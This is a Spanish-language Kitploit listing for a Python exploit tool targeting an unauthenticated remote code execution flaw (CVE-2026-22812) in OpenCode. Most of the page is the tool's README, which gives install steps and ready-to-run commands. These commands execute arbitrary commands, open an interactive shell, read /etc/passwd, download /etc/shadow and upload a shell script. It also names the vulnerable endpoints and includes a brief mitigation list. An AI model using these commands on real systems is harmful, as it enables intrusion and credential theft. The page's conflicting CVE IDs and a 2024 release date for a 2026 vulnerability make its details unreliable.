Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-22812 — Herramienta de explotación en Python para RCE en OpenCode (CVE-2026-22812) que proporciona ejecución de comandos, lectura/escritura/subida/descarga de archivos y shell interactiva para pruebas de penetración autorizadas. | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-22812
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHub0xgh057r3c0n/cve-2026-22812

CVE-2026-22812

Herramienta de explotación en Python para RCE en OpenCode (CVE-2026-22812) que proporciona ejecución de comandos, lectura/escritura/subida/descarga de archivos y shell interactiva para pruebas de penetración autorizadas.

Ver Repositorio
21hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-22812

Descripción general

Una herramienta de explotación en Python para la vulnerabilidad de Ejecución Remota de Código (RCE) en OpenCode que afecta a versiones < v1.0.216. Esta herramienta proporciona múltiples vectores de ataque, incluida la ejecución de comandos, lectura/escritura de archivos, subida/descarga de archivos y shell interactiva.

Aviso legal

⚠️ SOLO PARA PRUEBAS AUTORIZADAS ⚠️

  • Esta herramienta está destinada únicamente a pruebas de seguridad legítimas y pruebas de penetración autorizadas
  • Úsela solo en sistemas que posea o para los que tenga permiso explícito de prueba
  • El autor no es responsable de ningún uso indebido o daño causado por esta herramienta
  • El acceso no autorizado a sistemas informáticos es ilegal y está penado por la ley

Características

  • Detección de vulnerabilidad: Comprueba si el objetivo es vulnerable
  • Ejecución de comandos: Ejecuta comandos arbitrarios en el objetivo
  • Operaciones con archivos: Lee, escribe, sube y descarga archivos
  • Shell interactiva: Shell interactiva completa con autocompletado de pestañas
  • Reconocimiento del sistema: Recopila información del sistema
  • Soporte de proxy: Enruta el tráfico a través de un proxy HTTP
  • Seguimiento de estadísticas: Supervisa las actividades de explotación

Instalación

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/0xgh057r3c0n/CVE-2026-22812.git
cd CVE-2026-22812

# Instalar dependencias
pip install requests urllib3

# Hacer ejecutable (opcional)
chmod +x CVE-2026-22812.py

Requisitos

  • Python 3.6+
  • Biblioteca requests
  • Biblioteca urllib3

Uso

root@kitploit:~
python3 CVE-2026-22812.py -t http://objetivo:puerto [opciones]

Ejemplos básicos

root@kitploit:~
# Comprobar si el objetivo es vulnerable
python3 exploit.py -t http://10.0.0.1:4096 --check

# Shell interactiva
python3 exploit.py -t http://10.0.0.1:4096 -i

# Ejecutar un solo comando
python3 exploit.py -t http://10.0.0.1:4096 -c "id"

# Leer archivo
python3 exploit.py -t http://10.0.0.1:4096 -r /etc/passwd

# Subir archivo
python3 exploit.py -t http://10.0.0.1:4096 --upload shell.sh /tmp/shell.sh

# Descargar archivo
python3 exploit.py -t http://10.0.0.1:4096 --download /etc/shadow shadow.txt

# Obtener información del sistema
python3 exploit.py -t http://10.0.0.1:4096 --info

# Usar proxy (Burp Suite, etc.)
python3 exploit.py -t http://10.0.0.1:4096 -c "whoami" --proxy http://127.0.0.1:8080

Comandos de la shell interactiva

Una vez dentro de la shell interactiva (indicador -i), puede usar:

root@kitploit:~
<comando>                   Ejecutar comando de shell
help                       Mostrar menú de ayuda
exit                       Salir de la shell
session                    Mostrar ID de sesión
stats                      Mostrar estadísticas de explotación
read <archivo>             Leer contenido del archivo
download <remoto> <local>  Descargar archivo
upload <local> <remoto>    Subir archivo
sysinfo                    Obtener información del sistema

Detalles de la vulnerabilidad

  • ID de CVE: CVE-2026-22812 / CVE-2026-22182
  • Producto: OpenCode
  • Versiones afectadas: < v1.0.216
  • Tipo de vulnerabilidad: Ejecución Remota de Código
  • Vector de ataque: Red
  • Autenticación: No requerida

Detalles técnicos

La vulnerabilidad existe en el endpoint de gestión de sesiones (/session) que permite a usuarios no autenticados crear sesiones y ejecutar comandos arbitrarios a través del endpoint /session/{id}/shell.

Endpoints explotados:

  1. POST /session - Crear sesión
  2. POST /session/{id}/shell - Ejecutar comandos
  3. GET /file/content - Leer archivos

Mitigación

  1. Actualice a la versión de OpenCode ≥ v1.0.216
  2. Implemente autenticación y autorización adecuadas
  3. Restrinja el acceso de red a las instancias de OpenCode
  4. Implemente validación y saneamiento de entradas
  5. Use un Firewall de Aplicaciones Web (WAF)

Estructura del código

root@kitploit:~
CVE-2026-22812.py
├── Clase Colors (códigos de color ANSI)
├── print_banner() (Mostrar banner)
├── Clase Exploit (Lógica principal de explotación)
│   ├── __init__() (Inicialización)
│   ├── check_vuln() (Comprobación de vulnerabilidad)
│   ├── create_session() (Crear sesión)
│   ├── exec_cmd() (Ejecutar comando)
│   ├── read_file() (Leer archivo)
│   ├── write_file() (Escribir archivo)
│   ├── upload() (Subir archivo)
│   ├── download() (Descargar archivo)
│   ├── get_info() (Información del sistema)
│   ├── shell() (Shell interactiva)
│   └── Métodos auxiliares
└── main() (Análisis de argumentos)

Licencia

Esta herramienta se publica únicamente con fines educativos. Úsela bajo su propio riesgo.

Autor

  • GitHub: 0xgh057r3c0n
  • Herramienta: Herramienta de explotación CVE-2026-22812

Contribuciones

  1. Haga un fork del repositorio
  2. Cree una rama de características
  3. Confirme sus cambios
  4. Envíe los cambios a la rama
  5. Cree una Solicitud de Extracción (Pull Request)

Agradecimientos

  • Investigadores de seguridad que descubrieron la vulnerabilidad
  • Comunidad de código abierto
  • Todos los colaboradores y evaluadores

Referencias

  • Aviso de seguridad de OpenCode
  • Base de datos de CVE
  • Entrada de NVD

Soporte

Para problemas y preguntas, por favor:

  1. Revise los problemas existentes en GitHub
  2. Cree un nuevo problema con una descripción detallada
  3. Incluya la URL del objetivo (si es posible) y los mensajes de error

Historial de versiones

  • v1.0.0 (2024-01-20): Versión inicial
    • Detección de vulnerabilidad
    • Ejecución de comandos
    • Operaciones con archivos
    • Shell interactiva
    • Soporte de proxy
Descargar herramienta